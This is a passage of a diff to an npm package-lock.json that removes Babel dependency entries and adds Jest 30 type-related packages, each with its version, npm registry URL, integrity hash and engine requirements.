"sha512-75+KxFB4CZqYRXjx4NlR4J7yGvKumBuZTmV4NV6v09dVXXkuYVYLT68N6HCzLvfJ+fWCxQsntNzKwwIXL4bHnw==", + "node_modules/@types/jest/node_modules/@jest/expect-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-30.0.4.tgz", + "integrity": "sha512-EgXecHDNfANeqOkcak0DxsoVI4qkDUsR7n/Lr2vtmTBjwLPBnnPOF71S11Q8IObWzxm2QgQoY6f9hzrRD3gHRA==", "dev": true, + "license": "MIT", "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.7", - "@babel/helper-compilation-targets": "^7.22.6", - "@babel/helper-module-transforms": "^7.22.5", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2" + "@jest/get-type": "30.0.1" }, "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/core/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", + "node_modules/@types/jest/node_modules/@jest/schemas": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-30.0.1.tgz", + "integrity": "sha512-+g/1TKjFuGrf1Hh0QPCv0gISwBxJ+MQSNXmG9zjHy7BmFhtoJ9fdNhWJp3qUKRi93AOZHXtdxZgJ1vAtz6z65w==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" + "@sinclair/typebox": "^0.34.0" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.6.tgz", - "integrity": "sha512-534sYEqWD9VfUm3IPn2SLcH4Q3P86XL+QvqdC7ZsFrzyyPF3T4XGiVghF6PTYNdWg6pXuoqXxNQAhbYeEInTzA==", + "node_modules/@types/jest/node_modules/@jest/types": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/types/-/types-30.0.1.tgz", + "integrity": "sha512-HGwoYRVF0QSKJu1ZQX0o5ZrUrrhj0aOOFA8hXrumD7SIzjouevhawbTjmXdwOmURdGluU9DM/XvGm3NyFoiQjw==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/compat-data": "^7.22.6", - "@babel/helper-validator-option": "^7.22.5", - "@nicolo-ribaudo/semver-v6": "^6.3.3", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1" + "@jest/pattern": "30.0.1", + "@jest/schemas": "30.0.1", + "@types/istanbul-lib-coverage": "^2.0.6", + "@types/istanbul-reports": "^3.0.4", + "@types/node": "*", + "@types/yargs": "^17.0.33", + "chalk": "^4.1.2" }, "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", + "node_modules/@types/jest/node_modules/@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", + "dev": true, + "license": "MIT" + }, + "node_modules/@types/jest/node_modules/ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", "dev": true, + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", + "node_modules/@types/jest/node_modules/ci-info": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-4.3.0.tgz", + "integrity": "sha512-l+2bNRMiQgcfILUi33labAZYIWlH1kWDp+ecNo5iisRKrbm0xcRyCww71/YU0Fkw0mAFpz9bJayXPjey6vkmaQ==", "dev": true, - "dependencies": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - }, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/sibiraj-s" + } + ], + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=8" } }, - "node_modules/@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", + "node_modules/@types/jest/node_modules/expect": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/expect/-/expect-30.0.4.tgz", + "integrity": "sha512-dDLGjnP2cKbEppxVICxI/Uf4YemmGMPNy0QytCbfafbpYk9AFQsxb8Uyrxii0RPK7FWgLGlSem+07WirwS3cFQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" + "@jest/expect-utils": "30.0.4", + "@jest/get-type": "30.0.1", + "jest-matcher-utils": "30.0.4", + "jest-message-util": "30.0.2", + "jest-mock": "30.0.2", + "jest-util": "30.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", + "node_modules/@types/jest/node_modules/jest-diff": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-30.0.4.tgz", + "integrity": "sha512-TSjceIf6797jyd+R64NXqicttROD+Qf98fex7CowmlSn7f8+En0da1Dglwr1AXxDtVizoxXYZBlUQwNhoOXkNw==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" + "@jest/diff-sequences": "30.0.1", + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "pretty-format": "30.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.5.tgz", - "integrity": "sha512-+hGKDt/Ze8GFExiVHno/2dvG5IdstpzCq0y4Qc9OJ25D4q3pKfiIP/4Vp3/JvhDkLKsDK2api3q3fpIgiIF5bw==", + "node_modules/@types/jest/node_modules/jest-matcher-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-30.0.4.tgz", + "integrity": "sha512-ubCewJ54YzeAZ2JeHHGVoU+eDIpQFsfPQs0xURPWoNiO42LGJ+QGgfSf+hFIRplkZDkhH5MOvuxHKXRTUU3dUQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.5", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.5", - "@babel/types": "^7.22.5" + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "jest-diff": "30.0.4", + "pretty-format": "30.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", + "node_modules/@types/jest/node_modules/jest-message-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-30.0.2.tgz", + "integrity": "sha512-vXywcxmr0SsKXF/bAD7t7nMamRvPuJkras00gqYeB1V0WllxZrbZ0paRr3XqpFU2sYYjD0qAaG2fRyn/CGZ0aw==", "dev": true, + "license": "MIT", + "dependencies": { + "@babel/code-frame": "^7.27.1", + "@jest/types": "30.0.1", + "@types/stack-utils": "^2.0.3", + "chalk": "^4.1.2", + "graceful-fs": "^4.2.11", + "micromatch": "^4.0.8", + "pretty-format": "30.0.2", + "slash": "^3.0.0", + "stack-utils": "^2.0.6" + }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", + "node_modules/@types/jest/node_modules/jest-mock": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-30.0.2.tgz", + "integrity": "sha512-PnZOHmqup/9cT/y+pXIVbbi8ID6U1XHRmbvR7MvUy4SLqhCbwpkmXhLbsWbGewHrV5x/1bF7YDjs+x24/QSvFA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" + "@jest/types": "30.0.1", + "@types/node": "*", + "jest-util": "30.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", + "node_modules/@types/jest/node_modules/jest-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-30.0.2.tgz", + "integrity": "sha512-8IyqfKS4MqprBuUpZNlFB5l+WFehc8bfCe1HSZFHzft2mOuND8Cvi9r1musli+u6F3TqanCZ/Ik4H4pXUolZIg==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" + "@jest/types": "30.0.1", + "@types/node": "*", + "chalk": "^4.1.2", + "ci-info": "^4.2.0", + "graceful-fs": "^4.2.11", + "picomatch": "^4.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", + "node_modules/@types/jest/node_modules/picomatch": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.2.tgz", + "integrity": "sha512-M7BAV6Rlcy5u+m6oPhAPFgJTzAioX/6B0DxyvDlo9l8+T3nLKbrczg2WLUyzd45L8RqfUMyGPzekbMvX2Ldkwg==", "dev": true, + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" } }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", + "node_modules/@types/jest/node_modules/pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", "dev": true, + "license": "MIT", + "dependencies": { + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" + }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", + "node_modules/@types/node": { + "version": "20.4.1", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", + "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", + "dev": true + }, + "node_modules/@types/stack-utils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", + "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", "dev": true, - "engines": { - "node": ">=6.9.0" - } + "license": "MIT" }, - "node_modules/@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", + "node_modules/@types/yargs": { + "version": "17.0.33", + "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", + "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" + "@types/yargs-parser": "*" } }, - "node_modules/@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", + "node_modules/@types/yargs-parser": { + "version": "21.0.0", + "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", + "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", + "dev": true + }, + "node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", "dev": true, "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" + "color-convert": "^2.0.1" }, "engines": { - "node": ">=6.9.0" + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "node_modules/braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", "dev": true, + "license": "MIT", "dependencies": { - "color-convert": "^1.9.0" + "fill-range": "^7.1.1" }, "engines": { - "node": ">=4" + "node": ">=8" } }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", "dev": true, "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" }, "engines": { - "node": ">=4" + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" } }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "node_modules/color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", "dev": true, "dependencies": { - "color-name": "1.1.3" + "color-name": "~1.1.4" + }, + "engines": { + "node": ">=7.0.0" } }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", + "node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", "dev": true }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "node_modules/escape-string-regexp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", "dev": true, "engines": { - "node": ">=0.8.0" + "node": ">=8" } }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", + "node_modules/fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", "dev": true, + "license": "MIT", + "dependencies": { + "to-regex-range": "^5.0.1" + }, "engines": { - "node": ">=4" + "node": ">=8" } }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "node_modules/graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true + }, + "node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", "dev": true, - "dependencies": { - "has-flag": "^3.0.0" - }, "engines": { - "node": ">=4" + "node": ">=8" } }, - "node_modules/@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", + "node_modules/is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, + "license": "MIT", "engines": { - "node": ">=6.0.0" + "node": ">=0.12.0" } }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", + "node_modules/js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "license": "MIT" + }, + "node_modules/lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==", + "license": "MIT" }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", + "node_modules/micromatch": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "braces": "^3.0.3", + "picomatch": "^2.3.1" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">=8.6" } }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", + "node_modules/picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "license": "ISC" }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", + "node_modules/picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "engines": { + "node": ">=8.6" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" } }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", + "node_modules/react-is": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", + "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "license": "MIT" }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": 